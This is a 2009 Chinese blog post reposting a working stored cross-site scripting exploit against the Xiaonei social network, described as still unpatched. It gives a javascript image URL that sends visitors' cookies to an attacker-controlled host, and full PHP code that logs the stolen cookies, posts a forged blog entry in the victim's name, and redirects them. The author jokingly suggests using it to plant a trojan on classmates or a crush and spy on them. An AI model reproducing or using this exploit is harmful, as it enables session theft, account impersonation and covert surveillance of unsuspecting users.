注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

溪亭残月的博客

I want bring you into my heart !!

 
 
 

日志

 
 

校内网一个跨站漏洞的利用  

2009-04-13 16:13:29|  分类: 漏洞利用 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

官方目前还没有修补该漏洞。该漏洞是由Flyh4t 首发。之前我测试的时候插入图片,然后插入代码发表该文章的时候,当你阅览文章,会在1-2分钟内转到你希望要跳转的页面,如果传个网马,你是否就可以给自己的同学或者是暗恋的校花种个灰鸽子,然后监视她每天上网干嘛呢?^_^。俺PHP脚本根本不懂,所以还希望大牛能有更好的利用办法,插恶意代码有点太损了,是否能搞个恶作剧来玩玩呢。校内网一个跨站漏洞的利用 - 溪亭残月 - 溪亭残月的博客

漏洞利用方法如下:

校内网一个跨站漏洞的利用

BY Flyh4t

http://bbs.wolvez.org

校内网在发blog时对插入图片过滤不严格,存在xss漏洞.

在发blog时将插入图片URL写为如下代码即可触发:

Javascript 代码复制代码

javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie

javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie

test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:

Php 代码复制代码

引用

<?php

ob_start();

$url = 'blog.xiaonei.com';

$cookie=$_GET['cookie'];

$cookie1=$cookie."\r\n\r\n";

fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt

//发一条伪造的日志,这条日志里面也可以插入恶意代码

$sock = fsockopen("$url", 80, $errno, $errstr, 30);

if (!$sock) die("$errstr ($errno)\n");

$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";

fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");

fwrite($sock, "Accept: */*\r\n");

fwrite($sock, "Referer: http://$url\r\n");

fwrite($sock, "Accept-Language: zh-cn\r\n");

fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");

fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");

fwrite($sock, "User-Agent: Mozilla\r\n");

fwrite($sock, "Host: $url\r\n");

fwrite($sock, "Content-Length: ".strlen($data)."\r\n");

fwrite($sock, "Connection: Keep-Alive\r\n");

fwrite($sock, "Cache-Control: no-cache\r\n");

fwrite($sock, "Cookie:".$cookie."\r\n\r\n");

fwrite($sock, $data);

$headers = "";

while ($str = trim(fgets($sock, 4096)))

     $headers .= "$str\n";

echo "\n";

$body = "";

while (!feof($sock))

     $body .= fgets($sock, 4096);

fclose($sock);

//echo $body;

//跳转到一个正常的日志

Header("Location:http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx");

ob_end_flush();

?>

  评论这张
 
阅读(617)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017